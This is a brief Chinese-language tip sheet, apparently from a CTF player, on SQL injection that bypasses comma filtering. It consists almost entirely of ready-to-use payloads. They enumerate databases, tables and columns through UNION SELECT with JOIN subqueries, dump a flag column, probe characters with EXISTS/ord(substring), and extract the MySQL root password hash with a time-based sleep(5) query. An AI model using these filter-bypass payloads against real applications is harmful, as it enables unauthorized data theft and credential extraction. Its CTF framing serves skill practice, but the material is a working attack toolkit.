针对一些题目比较坑,会过滤掉逗号,所以一般的SQL注入都会失效 这里提供一种无逗号的注入方式:
1’ union select * from (select database()) a join (select version() ) b %23 //爆库
1’ union select * from (select group_concat(table_name) from information_schema.tables where table_schema=‘sqli’) a join (select version() ) b %23 //爆表
1’ union select * from (select group_concat(column_name) from information_schema.columns where table_name=‘users’) a join (select version() ) b %23 //爆字段
1’ union select * from (select flag_9c861b688330 from users) a join (select version() ) b %23 //报数据
另外CTF中有一些作者会诱导你去跳进他的坑里 除了后台访问 还要多尝试访问index.php test.php这种常用的php文件 抓包看有什么不同 并仔细查看状态码的不同 判断后台是否有线索
————————————————————————————————————————————
select * from table1 where id =1 and exists (select * from table2 where ord(substring(username from 1 for 1)=97);
127’ UNION SELECT * FROM ((SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d JOIN (SELECT 5)e)#
select case when substring((select password from mysql.user where user=‘root’) from 1 for 1)=‘e’ then sleep(5) else 0 end #
substring((select password from mysql.user where user=‘root’) from -1)=‘e’
————————————————————————————————————————————
这里再提供一下无逗号查询的例句 根据需要更改即可
具体可以参考:
https://blog.csdn.net/nzjdsds/article/details/81322529